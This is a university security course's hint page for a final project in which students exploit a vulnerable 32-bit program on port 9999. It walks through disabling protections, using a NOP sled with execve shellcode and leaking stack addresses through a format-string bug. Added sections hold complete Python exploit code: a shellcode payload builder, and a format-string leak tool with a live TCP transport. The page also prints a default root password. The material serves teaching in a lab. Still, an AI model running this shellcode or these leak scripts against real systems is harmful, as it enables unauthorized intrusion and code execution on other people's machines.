Hint for Final Project

2017-Fall Course Website

Advisor: Si Chen

The remote server ( is running a vulnerable program (final1) on port 9999. The remote OS is 32-bit Ubuntu. We know the source code of this program [this], so we can first try to hack it locally. Here are some hints:

Step 1: Hack it locally

  • Build a 32-bit binary with the stack protector and DEP turned off when you compile the code: gcc final1.c -o final -m32 -fno-stack-protector -zexecstack (-fno-stack-protector removes the stack canary, -zexecstack makes the stack executable; ASLR is a kernel setting, not a compiler flag, and is handled in the next step)
  • Check ASLR

    Type: cat /proc/sys/kernel/randomize_va_space  If it prints 0, ASLR is already turned off. Otherwise (1 or 2), we need to turn it off manually.

    (screenshot: check ASLR)

    To turn off ASLR:

    Change to root user: su root, default password is chensi
    Then type: echo 0 > /proc/sys/kernel/randomize_va_space (this setting does not survive a reboot, so check it again after restarting the VM)
  • The goal is to read flag.txt. In order to do that, you can first create a "fake" flag.txt file in your Manjaro VM. To make things easy, put both the vulnerable program (final) and the file "flag.txt" into the same folder.
  • There is no function in final1.c that can be used directly to read flag.txt, so write your own: not in C, but as machine code written in hexadecimal that you put into your shellcode!
  • P.S. To spawn a shell, write the equivalent of an execve("/bin/bash") call as machine code and represent it in hexadecimal. This link might be helpful: Link
  • Here is the basic structure of the shellcode (based on what we learned in lab1):
  • We can add a NOP sled to make it more "robust", since the return address then only has to land somewhere inside the sled:
  • Now, write down the actual shellcode that spawns a new shell for you (like the outcome of lab2).
  • Nothing happened?? If you feed the shellcode from a file with <, the spawned /bin/bash inherits that file as its stdin and exits as soon as it reaches end of input, before you can type anything. To keep it keyboard interactive, let cat forward the file and then your keyboard: cat shellcode - | ./final
  • You can use GDB to help you DEBUG your shellcode. If your shellcode works, you can immediately type cat flag.txt and check the local file.
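Putting the Step 1 hints together: the following Python 3 script is an added example, not part of the course page or the lab material. It assembles the payload the hints describe (NOP sled, then the execve shellcode, then the overwritten return address) and writes it to a file named shellcode for the cat shellcode - | ./final trick. The shellcode is hand-assembled 32-bit Linux code for execve("////bin/bash"); the extra leading slashes pad the path to exactly 12 bytes so that no instruction encodes a NUL byte. BUF_ADDR and OVERFLOW_LEN are placeholders: read the buffer address and the distance from the buffer to the saved return address from GDB for your own build of final.

```python
#!/usr/bin/env python3
"""Added example: build the NOP-sled + execve shellcode payload for the local copy of `final`.
Target assumptions: 32-bit Linux, ASLR off, executable stack, input copied as a C string."""
import struct

# Hand-assembled i386 Linux shellcode: execve("////bin/bash", ["////bin/bash", NULL], NULL).
# The leading slashes pad the path to 12 bytes (three dword pushes), so the terminating
# NUL comes from `push eax` and no instruction contains a 0x00 byte.
SHELLCODE = (
    b"\x31\xc0"                  # xor  eax, eax
    b"\x31\xd2"                  # xor  edx, edx        ; envp = NULL
    b"\x50"                      # push eax             ; NUL that terminates the path
    b"\x68\x62\x61\x73\x68"      # push 0x68736162      ; "bash"
    b"\x68\x62\x69\x6e\x2f"      # push 0x2f6e6962      ; "bin/"
    b"\x68\x2f\x2f\x2f\x2f"      # push 0x2f2f2f2f      ; "////"
    b"\x89\xe3"                  # mov  ebx, esp        ; ebx -> "////bin/bash"
    b"\x50"                      # push eax             ; argv[1] = NULL
    b"\x53"                      # push ebx             ; argv[0] = path
    b"\x89\xe1"                  # mov  ecx, esp        ; ecx -> argv
    b"\xb0\x0b"                  # mov  al, 11          ; SYS_execve
    b"\xcd\x80"                  # int  0x80
)
NOP = b"\x90"

# PLACEHOLDERS (assumptions, not from the course page): take both values from GDB.
BUF_ADDR = 0xffffd500   # address of the overflowed buffer (e.g. `p &buf` in gdb)
OVERFLOW_LEN = 256      # bytes from the start of the buffer to the saved return address


def bad_bytes(data, forbidden=b"\x00\x0a"):
    """Return the forbidden bytes present in `data`: NUL ends a strcpy(), '\\n' ends a gets()."""
    return {b for b in forbidden if bytes([b]) in data}


def landing_address(buf_addr, overflow_len, shellcode_len):
    """Aim the overwritten return address at the middle of the NOP sled, so a buffer that
    shifts by a few bytes (different environment or argv) still lands inside the sled."""
    sled_len = overflow_len - shellcode_len
    if sled_len <= 0:
        raise ValueError("shellcode does not fit before the saved return address")
    return buf_addr + sled_len // 2


def build_payload(buf_addr=BUF_ADDR, overflow_len=OVERFLOW_LEN, shellcode=SHELLCODE,
                  ret_copies=4):
    """Layout: [NOP sled][shellcode][ret_addr x ret_copies]['\\n'].
    Repeating the address tolerates a small error in OVERFLOW_LEN; the newline ends the line."""
    ret = struct.pack("<I", landing_address(buf_addr, overflow_len, len(shellcode)))
    sled = NOP * (overflow_len - len(shellcode))
    payload = sled + shellcode + ret * ret_copies
    bad = bad_bytes(payload)
    if bad:
        raise ValueError("payload contains bytes that would truncate it: %r" % sorted(bad))
    return payload + b"\n"


if __name__ == "__main__":
    payload = build_payload()
    with open("shellcode", "wb") as f:
        f.write(payload)
    print("wrote %d bytes; now run:  cat shellcode - | ./final" % len(payload))
```

If the target address or the sled happened to contain 0x00 or 0x0a, build_payload refuses to write the file; pick a different landing address inside the sled (or a different OVERFLOW_LEN) rather than hoping the copy does not stop early.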

Step 2: Hack it remotely

  • Do the same thing, but this time remotely.
  • Feel free to create your own Java program to send messages to this server, or, if you prefer, you can use this Python script [Link]
  • W() sends "data" to the remote server, just as if you typed it and hit the Enter key inside your VM's terminal
  • R() reads the response from the remote server
  • You can try it by typing python2 attack.py in your terminal
  • Now, tweak your shellcode and hack the remote server!
  • You probably need to use the "Format String" vulnerability to leak a remote memory (stack) address: even with ASLR off, the remote stack layout differs from your VM's (different environment variables, different path), so the address that worked locally will not be the same there.
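How the "Format String" hint is used in practice, as an added example that is not the course's attack.py and does not reproduce final1's real I/O: send %N$p probes, parse the pointers the remote printf() prints back, and pick out the ones that are stack addresses. It assumes the server passes our line to printf() as the format string, answers one line per request, and speaks over a plain TCP socket; the host is a placeholder, and fake_printf_server() with FAKE_STACK is constructed data so the script can be exercised offline without the server.

```python
#!/usr/bin/env python3
"""Added example: leak remote stack addresses through a format-string bug.
Assumptions (not from the course page): the server passes our line to printf() as the
format string, answers one line per request, and listens on a plain TCP socket."""
import re
import socket

HOST, PORT = "127.0.0.1", 9999      # placeholder host; only the port is given on the page
HEX_RE = re.compile(rb"0x[0-9a-fA-F]{1,8}")


def probe(index):
    """'%N$p' makes printf print the N-th argument slot above the format string as a pointer."""
    return b"%%%d$p\n" % index


def parse_leak(line):
    """Return the first 0x... value in a response line, or None (glibc prints NULL as '(nil)')."""
    m = HEX_RE.search(line)
    return int(m.group(0), 16) if m else None


def leak_stack(talk, first=1, last=40):
    """Probe slots first..last with one request each and return {slot: value}.
    `talk(bytes) -> bytes` does W() then R(); see tcp_talk() and fake_printf_server()."""
    leaked = {}
    for i in range(first, last + 1):
        val = parse_leak(talk(probe(i)))
        if val is not None:
            leaked[i] = val
    return leaked


def stack_candidates(leaked):
    """With ASLR off, a 32-bit process's stack sits just below 0xffffffff, so leaked values
    in 0xff000000..0xffffffff are stack pointers (saved ebp, argv, ...); use one near your buffer."""
    return {i: v for i, v in leaked.items() if 0xff000000 <= v <= 0xffffffff}


def find_input_slot(talk, marker=b"AAAA", last=40):
    """Send 'AAAA%N$p' for increasing N; the slot that prints 0x41414141 is where our own
    input starts on the stack, i.e. how far the format string is from printf's arguments."""
    want = int.from_bytes(marker, "little")
    for i in range(1, last + 1):
        if parse_leak(talk(marker + probe(i))) == want:
            return i
    return None


def tcp_talk(host=HOST, port=PORT):
    """Real transport: one connection; each call sends a line and reads one response."""
    sock = socket.create_connection((host, port))

    def talk(data):
        sock.sendall(data)
        return sock.recv(4096)
    return talk


# Constructed data for offline use: a fake 32-bit stack, one dword per slot, with our input
# landing at slot 7. The values are made up to resemble a typical no-ASLR frame.
FAKE_STACK = [0x00000040, 0xf7fc5000, 0x08048612, 0xffffd5a0, 0x00000000,
              0xffffd5e8, 0xdeadbeef, 0xdeadbeef, 0xdeadbeef, 0xdeadbeef]


def fake_printf_server(stack, input_slot):
    """Offline stand-in for the vulnerable server: copies our line onto a copy of `stack`
    starting at `input_slot` (1-based) and answers a single '%N$p' the way printf would."""
    def talk(data):
        frame = list(stack)
        padded = data + b"\x00" * (-len(data) % 4)
        for k in range(0, len(padded), 4):
            idx = input_slot - 1 + k // 4
            if idx < len(frame):
                frame[idx] = int.from_bytes(padded[k:k + 4], "little")
        m = re.search(rb"%(\d+)\$p", data)
        if not m:
            return b"\n"
        n = int(m.group(1))
        return b"0x%x\n" % frame[n - 1] if 0 < n <= len(frame) else b"(nil)\n"
    return talk


if __name__ == "__main__":
    talk = fake_printf_server(FAKE_STACK, 7)   # swap for tcp_talk() against the real target
    leaked = leak_stack(talk, 1, len(FAKE_STACK))
    print("our input starts at slot", find_input_slot(talk, last=len(FAKE_STACK)))
    for slot, addr in stack_candidates(leaked).items():
        print("slot %2d -> stack address 0x%08x" % (slot, addr))
```

Once you have a leaked stack pointer, run the same probe against your local copy under GDB, measure the distance from that pointer to your buffer there, and add the same distance to the remote value: the distance between two stack slots in the same frame is fixed by the compiled code, while the absolute addresses are what differ between the two machines.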